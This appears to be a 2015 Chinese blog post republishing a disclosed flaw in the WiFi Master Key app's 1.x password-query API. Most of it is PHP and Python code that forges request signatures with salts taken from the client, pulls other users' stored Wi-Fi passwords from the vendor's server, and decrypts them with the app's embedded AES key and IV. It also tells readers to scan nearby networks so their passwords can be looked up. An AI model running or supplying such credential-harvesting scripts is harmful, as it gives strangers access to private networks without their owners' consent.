WIFI万能钥匙密码查询接口

发布时间:August 11, 2015 // 分类:开发笔记,工作日志,PHP,windows // 5 Comments

拜读了《WIFI万能钥匙密码查询接口算法破解(可无限查询用户AP明文密码)》http://www.wooyun.org/bugs/wooyun-2015-099268一文

通过程序包分析算法(说一下在,各种key,salt明文存储,连混淆哪怕是字符拼接都没有。。。)

这个是查询密码用到的数据包,以及参数中sign(签名)的算法,其实就是这些数据进行排序后用salt算个md5。新版本的万能钥匙还有个retSn,实现链式认证,也能突破,但这个报告只说1.x版本的API问题(1.x时代很多细节明显没有考虑完善,基本只靠sign做安全)

<?php
//some code from http://www.wooyun.org/bugs/wooyun-2015-099268
$bssid = "c8:3a:35:fa:b8:80";   // sample AP values copied from the referenced report
$ssid = "Podinns2F03";

if(isset($bssid) && isset($ssid)){
//update salt
    // Step 1: query with a throwaway salt (md5 of a random int). The reply
    // carries retSn, which the 1.x API expects as the salt of the next call
    // (the "chained" check described in the post above).
    $ret = request($bssid, $ssid, md5(rand(1, 10000)));
    $ret = json_decode($ret);

    // Step 2: the real query, signed with retSn.
    // NOTE(review): json_decode() returns null on a non-JSON/failed response,
    // so $ret->retSn would then be read from null (PHP notice, empty salt).
    $ret = request($bssid, $ssid, $ret->retSn);
    $ret = json_decode($ret);
    if($ret->retCd == 0){
        if($ret->qryapwd->retCd == 0){
            $list = $ret->qryapwd->psws;
            foreach($list as $wifi){
                echo 'SSID: '.$wifi->ssid."\n";
                // pwd is hex-encoded AES ciphertext, see decryptStrin() below
                echo 'PWD: '.decryptStrin($wifi->pwd)."\n";
                echo 'BSSID: '.$wifi->bssid."\n";
                // xUser/xPwd: extra credential fields, only printed when present
                if($wifi->xUser){
                    echo 'xUser: '.$wifi->xUser."\n";
                    echo 'xPwd: '.$wifi->xPwd."\n";
                }
            }
        }
        else{
            echo $ret->qryapwd->retMsg;
        }
    }
}
/**
 * POST one signed qryapwd query to the 1.x API endpoint and return the body.
 *
 * Every field except $bssid, $ssid and $dhid is a hard-coded app/device
 * identifier copied from the client. $salt is either a throwaway value
 * (first call) or the retSn returned by the previous response; sign()
 * folds it into the MD5 that the server checks.
 *
 * @param string $bssid AP MAC address being queried
 * @param string $ssid  AP network name being queried
 * @param string $salt  value appended to the concatenated fields before hashing
 * @param string $dhid  device id field (default copied from the report)
 * @return string|false raw response body, or false when curl_exec() fails
 */
function request($bssid, $ssid, $salt, $dhid = 'ff8080814cc5798a014ccbbdfa375369'){
    $data = array();
    $data['appid'] = '0008';
    $data['bssid'] = $bssid;
    $data['chanid'] = 'gw';
    $data['dhid'] = $dhid;
    $data['ii'] = '609537f302fc6c32907a935fb4bf7ac9';
    $data['lang'] = 'cn';
    $data['mac'] = '60f81dad28de';
    $data['method'] = 'getDeepSecChkSwitch';
    $data['pid'] = 'qryapwd:commonswitch';
    $data['ssid'] = $ssid;
    $data['st'] = 'm';
    $data['uhid'] = 'a0000000000000000000000000000001';
    $data['v'] = '324';
    // sign() ksorts the array itself, so the insertion order above is irrelevant
    $data['sign'] = sign($data, $salt);

    $curl = curl_init();
    // Plain HTTP: the whole query, including the sign value, travels in cleartext.
    curl_setopt($curl, CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd');
    curl_setopt($curl, CURLOPT_USERAGENT,'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))');
    // Has no effect on the http:// URL above; would disable TLS certificate
    // validation if the endpoint were https://.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_POST, true); // enable posting
    curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($data)); // form-encoded body
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); // follow any redirect
    $r = curl_exec($curl); // false on transport failure; caller does not check
    curl_close($curl);
    return $r;
}

/**
 * Build a request body signed with the client's built-in static salt.
 *
 * NOTE(review): as written this is a stub. $bssid, $ssid and $dhid are not
 * defined inside this function (PHP function scope does not see the
 * globals above), nothing is sent, and $data is discarded on return.
 * The salt below is a fixed string shipped in the client, so it is
 * recoverable by anyone with the app and provides no authentication.
 */
function registerNewDevice(){
    $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$';

    $data = array();
    $data['appid'] = '0008';
    $data['bssid'] = $bssid;
    $data['chanid'] = 'gw';
    $data['dhid'] = $dhid;
    $data['ii'] = '609537f302fc6c32907a935fb4bf7ac9';
    $data['lang'] = 'cn';
    $data['mac'] = '60f81dad28de';
    $data['method'] = 'getDeepSecChkSwitch';
    $data['pid'] = 'qryapwd:commonswitch';
    $data['ssid'] = $ssid;
    $data['st'] = 'm';
    $data['uhid'] = 'a0000000000000000000000000000001';
    $data['v'] = '324';
    $data['sign'] = sign($data, $salt);
}

/**
 * Compute the request signature: MD5 over the values of $array taken in
 * key order, followed by $salt, returned as upper-case hex.
 *
 * ksort mirrors the client's Arrays.sort on the field names. Note that
 * MD5(data . salt) with a salt embedded in the client is not a MAC: whoever
 * extracts the salt can forge the value, which is the weakness the post
 * describes.
 *
 * @param array  $array request fields (key => value)
 * @param string $salt  secret appended before hashing
 * @return string 32-char upper-case hex digest
 */
function sign( $array , $salt ){
    ksort( $array );
    $digest_input = implode('', $array) . $salt;
    return strtoupper( md5( $digest_input ) );
}

/**
 * Decrypt a hex-encoded pwd field with the fixed key/IV shipped in the client.
 *
 * Cipher is Rijndael-128 in CBC mode with no padding (AES/CBC/NoPadding on
 * the client side). The plaintext layout is [length][password][timestamp];
 * the 3-byte prefix and 13-byte suffix are sliced off after trim().
 *
 * NOTE(review): trim() strips whitespace and NUL bytes from both ends before
 * slicing, so a password whose first/last byte is one of those would be
 * truncated; left as is. mcrypt_* was removed in PHP 7.2.
 *
 * @param string $str        hex string; pack("H*") converts it to raw bytes
 * @param string $keys       static AES key embedded in the client
 * @param string $iv         static IV embedded in the client
 * @param string $cipher_alg mcrypt cipher constant
 * @return string recovered password bytes
 */
function decryptStrin($str,$keys='k%7Ve#8Ie!5Fb&8E',$iv='y!0Oe#2Wj#6Pw!3V',$cipher_alg=MCRYPT_RIJNDAEL_128){
    // The client encrypts passwords with AES/CBC/NoPadding
    //[length][password][timestamp]
    $decrypted_string = mcrypt_decrypt($cipher_alg, $keys, pack("H*",$str),MCRYPT_MODE_CBC, $iv);
    return substr(trim($decrypted_string),3,-13);
}
?>

说明:如何查看附近的WIFI

powershell或者cmd执行netsh wlan show network mode=bssid,将结果粘贴进去

air用户则

执行airport -s,将结果粘贴进去
如果提示没有airport,先执行
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

我们qu查询huipu那个~

附上一个PYTHON查询脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: iswin

from Crypto.Cipher import AES
import base64
import requests
import hashlib
import random
import json
import sys

def request(bssid,ssid,salt):
    """POST one signed qryapwd query and return the raw response text.

    Mirrors the PHP request() above: every field except bssid/ssid is a
    hard-coded app/device identifier copied from the client, and ``sign``
    is MD5(values concatenated in key order + salt), upper-cased. The
    request goes over plain HTTP, so query and sign travel in cleartext.
    """
    url='http://wifiapi02.51y5.net/wifiapi/fa.cmd'
    # NOTE(review): 'useg_agent' is not a recognised header name, so this is
    # sent as an unknown header rather than as User-Agent; left as is.
    headers={'useg_agent':'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))'}
    data={'appid':'0008','bssid':bssid,'chanid':'gw','dhid':'ff8080814cc5798a014ccbbdfa375369','ii':'609537f302fc6c32907a935fb4bf7ac9','lang':'cn','mac':'60f81dad28de','method':'getDeepSecChkSwitch','pid':'qryapwd:commonswitch','ssid':ssid,'st':'m','uhid':'a0000000000000000000000000000001','v':'324'}
    # sorted(keys) + value concatenation == the PHP ksort() loop in sign()
    data['sign']=md5(''.join([data[k] for k in sorted(data.keys())]),salt).upper()
    return requests.post(url,data, headers=headers).text

def md5(str, salt):
    """Return the hex MD5 digest of ``str`` followed by ``salt``.

    The first parameter shadows the builtin ``str``; the name is kept for
    callers. Both arguments are concatenated as-is, so on Python 3 they
    must be bytes (hashlib does not accept text).
    """
    return hashlib.md5(str + salt).hexdigest()

def decrypt(data):
    """Decrypt a hex-encoded pwd field and return the password bytes.

    Same parameters as the PHP decryptStrin() above: AES-128-CBC with the
    fixed key/IV embedded in the client and no padding. The plaintext is
    [length][password][timestamp]; trailing NUL padding is stripped, then
    the 3-byte prefix and 13-byte suffix are sliced off.

    NOTE(review): str(bytearray(...)) yields the raw bytes only on
    Python 2; on Python 3 it yields the repr text, so this helper (like the
    print statements below) is Python 2 only.
    """
    PADDING = '\0'
    key = 'k%7Ve#8Ie!5Fb&8E'   # static key shipped in the client (see post above)
    iv = 'y!0Oe#2Wj#6Pw!3V'    # static IV shipped in the client
    recovery = AES.new(key, AES.MODE_CBC, iv).decrypt(str(bytearray.fromhex(data)))
    return recovery.rstrip(PADDING)[3:-13]

if __name__ == '__main__':
    # Usage: wifi.py <bssid> <ssid>
    if(len(sys.argv)<2):
        print 'python wifi.py bssid ssid\nExample:python wifi.py c8:3a:35:fa:b8:80 Podinns2F03'
        exit()
    try:
        # NOTE(review): the length check above only guarantees argv[1]; a
        # missing ssid raises IndexError here, which is not caught below.
        bssid=sys.argv[1]
        ssid=sys.argv[2]
        # Step 1: throwaway salt (md5 of a random int, empty salt); the
        # reply's retSn becomes the salt of the real query.
        retSn=json.loads(request(bssid,ssid,md5(str(random.randint(1, 100000)),'')))['retSn']
        # Step 2: the real query, signed with retSn (the "chained" check
        # described in the post). A non-JSON body raises ValueError, uncaught.
        response=json.loads(request(bssid,ssid,retSn))
        if int(response['qryapwd']['retCd']) !=0:
            print 'ERROR:'+response['qryapwd']['retMsg']
            exit()
        # psws is keyed by bssid; an unknown bssid lands in the KeyError branch.
        password=response['qryapwd']['psws'][bssid]['pwd']
        print 'ssid:%s\nbssid:%s\npasswd:%s'%(ssid,bssid,decrypt(password))
    except KeyError:
        print 'ERROR:BSSID('+bssid+') NOT FOUND'
    


已有 5 条 关于 " WIFI万能钥匙密码查询接口 "的评论.

  1. 你好,我搜到你的这篇文章。请问 registerNewDevice 新设备注册部分是未写完吗?

    1. 写完了的啊.实际测试时可以使用的

    2. 写完了的啊.实际测试时可以使用的

  2. luoye luoye

    接口挂了......

  3. Tony Tony

    registerNewDevice确实挂了。
